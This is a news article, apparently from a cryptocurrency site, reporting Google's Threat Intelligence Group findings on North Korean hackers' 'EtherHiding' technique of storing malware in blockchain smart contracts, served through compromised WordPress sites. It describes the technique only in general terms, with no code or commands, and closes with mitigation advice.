News 
Coin Information 
About us 
Customer Service 
A new cyber threat is emerging as North Korean state-backed hackers adopt an advanced method called EtherHiding, embedding malicious code directly into blockchain networks. According to Google’s Threat Intelligence Group (GTIG), this approach represents a major evolution in how attackers exploit decentralized systems like Ethereum and BNB Smart Chain.
EtherHiding enables hackers to weaponize smart contracts and public blockchains to store malware payloads. Because blockchain data is immutable, removing or blocking these payloads becomes nearly impossible. Once a hacker uploads a malicious script, it can persist indefinitely without detection or interference.
The attack typically begins when hackers compromise legitimate WordPress websites using stolen credentials or unpatched vulnerabilities. A small JavaScript “loader” is inserted into the website’s code, silently fetching additional malware through blockchain connections whenever users visit the page. These operations occur mostly off-chain, leaving no visible transaction records and incurring minimal fees—allowing cybercriminals to act undetected.
GTIG traced the first instance of EtherHiding to September 2023, during a campaign called CLEARFAKE, which lured users with fake browser update notifications. Cybersecurity experts warn that this marks a shift in North Korea’s cyber strategy—from simply stealing crypto to exploiting blockchain itself as a weapon.
Researchers like John Scott-Railton of Citizen Lab caution that if EtherHiding combines with AI automation, future attacks could be nearly impossible to trace. This technique could transform blockchain technology into a new form of “bulletproof hosting,” shielding malware distribution from traditional cybersecurity defenses.
North Korean hackers have already stolen over $1.5 billion in crypto this year, according to TRM Labs, funding Pyongyang’s military and sanction-evasion programs. Experts advise users to block suspicious downloads, restrict unauthorized web scripts, and scrutinize smart contracts for embedded malicious code to mitigate this escalating threat.
Comment 0